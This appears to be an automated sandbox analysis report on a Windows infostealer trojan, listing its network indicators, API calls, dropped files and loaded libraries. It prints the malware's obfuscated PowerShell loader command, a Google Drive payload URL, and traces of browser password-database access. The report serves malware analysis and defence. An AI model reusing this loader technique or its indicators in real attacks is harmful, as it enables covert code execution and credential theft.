          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download7
          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download?
          Source: msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/ek
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/x
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49854 version: TLS 1.2
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exeJump to dropped file
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile created: C:\Windows\huzzah.lnkJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00406C5F0_2_00406C5F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303532111_2_03035321
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303D27811_2_0303D278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303C1A411_2_0303C1A4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303C73811_2_0303C738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303C46C11_2_0303C46C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303CA0811_2_0303CA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303E98811_2_0303E988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303CFAC11_2_0303CFAC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03033E1711_2_03033E17
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303CCD811_2_0303CCD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0303711811_2_03037118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03033AA111_2_03033AA1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_030339CD11_2_030339CD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326FC6811_2_2326FC68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326CCA011_2_2326CCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23260B2F11_2_23260B2F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23260B3011_2_23260B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326EB0811_2_2326EB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326EF6011_2_2326EF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326EF5111_2_2326EF51
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232617A011_2_232617A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23268BA011_2_23268BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326F3A811_2_2326F3A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326F3B811_2_2326F3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326179511_2_23261795
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23268B9111_2_23268B91
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326DE0011_2_2326DE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23261E7F11_2_23261E7F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326E24D11_2_2326E24D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326E25811_2_2326E258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326E6A111_2_2326E6A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326E6B011_2_2326E6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23261E8011_2_23261E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326EAFB11_2_2326EAFB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326296811_2_23262968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D54311_2_2326D543
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326954811_2_23269548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D55011_2_2326D550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D9A811_2_2326D9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D99911_2_2326D999
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326DDF111_2_2326DDF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326502811_2_23265028
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326003F11_2_2326003F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326F80311_2_2326F803
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326F81011_2_2326F810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_23269C1811_2_23269C18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326501811_2_23265018
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326004011_2_23260040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326CC9311_2_2326CC93
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D0E911_2_2326D0E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2326D0F811_2_2326D0F8
          Source: 87h216Snb7.exeStatic PE information: invalid certificate
          Source: 87h216Snb7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile created: C:\Users\user\AppData\Roaming\interpellantJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsq28CA.tmpJump to behavior
          Source: 87h216Snb7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020D4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D1B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D0B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 87h216Snb7.exeReversingLabs: Detection: 42%
          Source: C:\Users\user\Desktop\87h216Snb7.exeFile read: C:\Users\user\Desktop\87h216Snb7.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\87h216Snb7.exe "C:\Users\user\Desktop\87h216Snb7.exe"
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\87h216Snb7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: fontext.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: fms.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Users\user\Desktop\87h216Snb7.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
